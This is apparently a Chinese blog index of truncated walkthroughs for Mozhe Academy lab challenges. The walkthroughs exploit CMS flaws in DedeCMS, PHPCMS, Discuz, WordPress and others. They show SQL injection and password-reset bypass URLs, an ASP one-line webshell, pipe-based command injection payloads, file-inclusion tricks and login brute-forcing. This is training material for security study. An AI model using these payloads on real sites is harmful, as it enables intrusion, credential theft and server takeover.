![](https://img-blog.csdnimg.cn/20201015150621950.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
墨者学院
靶场实验文档
ploto_cs
简单介绍一下:素质教育的漏网之鱼
展开
-
墨者学院—CMS系统漏洞分析溯源(第4题)—两种解法
一.解题思路登录后台利用文件解析漏洞插入一句话木马二.操作步骤解法一1.利用注入漏洞,获取后台密码构造语句http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user得到后台密码:121b28fa741f0976原创 2020-10-19 18:45:51 · 955 阅读 · 0 评论 -
墨者学院—本地执行漏洞溯源—两种解法
一.解题思路利用本地文件包含漏洞执行命令二.操作步骤解法一1.上传木马文件点击 非注册用户上传文件2.检查木马访问uoload/PHP.PHP发现浏览器报错,无法访问考虑存在本地文件包含漏洞访问/index.php?t=upload/PHP.PHP浏览器没有报错,木马上传成功3.使用蚁剑连接木马4.检查目录发现key.txt位于/var/www解法二同样是利用本地文件包含漏洞,通过 …/来跨越目录访问key.txt使用命令http://219.153.49.228:40原创 2020-10-17 16:26:56 · 267 阅读 · 0 评论 -
墨者学院—命令注入执行分析—两种解法
一.解题思路利用管道符构造命令二.操作步骤解法一1.测试127.0.0.1能否返回正常数据2.使用BP抓包,改包查看文件信息 iipp = 127.0.0.1|ls查看key文件信息 iipp = 127.0.0.1|cat key_x.php但是发现不能正常传输数据,空格被过滤。命令改为iipp = 127.0.0.1|cat<key_x.php解法二1.在火狐中禁用JS在URL中输入about:config 开启火狐高级设置2.命令127.0.0.1|ls3.原创 2020-10-17 15:14:06 · 495 阅读 · 2 评论 -
墨者学院-CMS系统漏洞分析溯源(第9题)
一.解题思路查询版本,直接使用工具破解二.操作步骤1.浏览网址可以看到版本号为Discuz 7.22.利用工具查看是否存在漏洞使用工具dz7.x_faq.py源码为:#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: utf-8 -*- # author iswin import sysimport hashlibimport timeimport mathimport base64import原创 2020-10-15 14:59:14 · 668 阅读 · 0 评论 -
墨者学院-CMS系统漏洞分析溯源(第6题)
CMS系统漏洞分析溯源(第6题)一.解题思路得到用户名之后爆破密码登录后台,再写入一句话木马二.操作步骤1.御剑扫描可以看到后台登录界面为http://ip:port/servlets/2.后台登录:已知用户名为mozhe777登录后台使用Burpsuite抓包,进行暴力破解设置类型为sniper开始攻击得到密码为qwer12343.成功登录后台,导出数据库,添加一句话在导出的文件中添加以下字段Drop TABLE IF EXISTS emlog_shell;C原创 2020-10-15 09:39:49 · 310 阅读 · 0 评论 -
墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍
解法一解题方法:使用一句话木马进行连接操作步骤:1.对网址进行探测2.发现后台版本文件robots.txt发现CMS为 PHPCMS v9后台登录页面为 admin.php3.浏览自动填入密码浏览源码可以发现密码为:I@vH@U$9n8*也可以将源码中密码的字段名由password改为text4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7题)存在相同的文件上传漏洞原文回顾:https://blog.csdn.net/ploto_cs/article/details/原创 2020-10-13 15:31:43 · 744 阅读 · 0 评论 -
墨者学院-CMS系统漏洞分析溯源(第3题)
一.漏洞描述在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell二.影响版本新云CMS 4.0.0 SP1三.漏洞复现1.使用御剑对域名进行探测登录网址为http://219.153.49.228/login.asp2.注册用户在“密码问题”插入一句话木马一句话木马为:<% execute request(“a”)%>”经过Erlang 中文简体字 GB2312 转 unicode 转换来的┼攠數畣整爠煥敵瑳∨≡┩愾3.检查木马是否上传成功原创 2020-10-09 15:29:27 · 535 阅读 · 0 评论 -
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
1.访问目标网站2.使用御剑对域名进行探测常用HTTP响应码:200一交易成功302一跳转400一错误请求403一禁止访问404一未发现目标500一内部服务器错误3.发现存在登录的网址网址:http://219.153.49.228:46188/wp-admin/4.使用BP对网站后台账户密码进行爆破通过使用暴力破解可以得到User:adminPassword:123qwe5.登录后台因为是Activity Monitor插件远程命令执行漏洞Activity Mon原创 2020-10-08 10:53:39 · 577 阅读 · 0 评论 -
墨者学院-CMS系统漏洞分析溯源(第7题)——亲妈级教程
墨者学院-CMS系统漏洞分析溯源(第7题)——亲妈级教程方法一:1.通过探测发现该靶场为DEDE-CMS 靶场为20180109http://host:post/data/admin/ver.txt为DEDE版本号位置2.构造请求获取重置密码链接请求1:http://219.153.49.228:47258/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1重置密原创 2020-09-30 09:21:41 · 1123 阅读 · 0 评论